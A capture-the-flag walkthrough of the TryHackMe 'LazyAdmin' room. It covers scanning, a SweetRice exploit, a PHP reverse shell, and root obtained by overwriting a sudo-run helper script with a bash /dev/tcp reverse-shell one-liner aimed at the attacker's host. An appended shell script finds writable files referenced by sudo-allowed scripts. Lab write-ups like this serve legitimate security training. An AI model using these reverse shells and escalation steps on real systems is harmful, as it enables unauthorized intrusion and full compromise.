LazyAdmin

Room Link: https://tryhackme.com/room/lazyadmin

Scanning

Initial Scan

Kali

nmap -A $VICTIM

Scan all ports

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

No other ports found.

TCP/80 - HTTP

Kali

gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

Kali

searchsploit sweet rice
searchsploit -m php/webapps/40718.txt

Link: https://crackstation.net/

Tried to SSH in with the credentials, but it didn't work. I went back to searchsploit because I had seen a Python script earlier that needed credentials. I modified the script to take the credentials as input because I was lazy.

Kali

git clone https://github.com/pentestmonkey/php-reverse-shell.git
searchsploit sweet rice
searchsploit -m php/webapps/40716.py
python 40716.py

The PHP reverse shell connects back to us, so I set up an nc listener on Kali and browsed to the URL the script mentioned.

Kali

nc -lvnp 1234

Get an interactive TTY (autocomplete)

Victim

python -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg

Privilege Escalation

The user can run backup.pl with sudo without a password. I checked the file and all it does is run a bash script, copy.sh. We have write access to copy.sh, so I replaced its contents with a reverse shell one-liner and set up my listener on Kali.

Kali

nc -lvnp 8080

Victim

# $KALI is expanded by the victim's shell before the line is written, so set it
# (or substitute the attacker IP) first; copy.sh then runs as root via sudo/perl
echo "bash -c 'bash -i >& /dev/tcp/$KALI/8080 0>&1'" > copy.sh
sudo /usr/bin/perl /home/itguy/backup.pl
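The check above was done by hand: read the sudo-allowed script, notice it runs another file, see that the other file is writable. The following sh script is an added example, not part of the room or the original writeup, that generalizes that step. Given any script that sudo lets you run, it lists every absolute path the script mentions and flags the ones the current user can write to; a WRITABLE hit is a file you can swap for your own payload, exactly as copy.sh was. The `demo` function builds a constructed stand-in for backup.pl in a temporary directory (the path names and the `/nonexistent/backup.log` reference are assumptions for the demo, not files from the room).

```shell
#!/bin/sh
# Added example (not from the original writeup): find writable files referenced
# by a script that sudo lets us run. Needs only POSIX sh, grep, sed, sort, mktemp.

# Print each absolute path mentioned in the script, one per line, deduplicated.
# A path is a run of path characters preceded by start-of-line, whitespace,
# a quote, a backtick or an opening parenthesis.
extract_paths() {
    grep -oE '(^|[[:space:]"'"'"'`(])/[A-Za-z0-9._/-]+' "$1" \
        | sed 's/^[^/]*//' \
        | sort -u
}

# For each referenced path print "WRITABLE <path>" or "not-writable <path>".
# Returns 0 if at least one path is writable by the current user, 1 otherwise.
writable_targets() {
    found=1
    for p in $(extract_paths "$1"); do
        if [ -w "$p" ]; then
            echo "WRITABLE $p"
            found=0
        else
            echo "not-writable $p"
        fi
    done
    return $found
}

# Constructed demo (assumption, not the room's files): a fake backup.pl that
# execs a helper script we own, like copy.sh in the room, and also references
# a log path that does not exist, so it is reported as not-writable.
demo() {
    tmp=$(mktemp -d) || return 2
    printf '#!/bin/sh\necho backup done\n' > "$tmp/copy.sh"
    printf 'system("%s/copy.sh");\nopen(L, ">>", "/nonexistent/backup.log");\n' \
        "$tmp" > "$tmp/backup.pl"
    writable_targets "$tmp/backup.pl"
    rc=$?
    rm -rf "$tmp"
    return $rc
}
```

On a real target, run `writable_targets` as the low-privilege user against each script listed by `sudo -l`; the owner of the helper script will always see it as writable, so the interesting result is a WRITABLE line for a file that root (or another user) owns.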
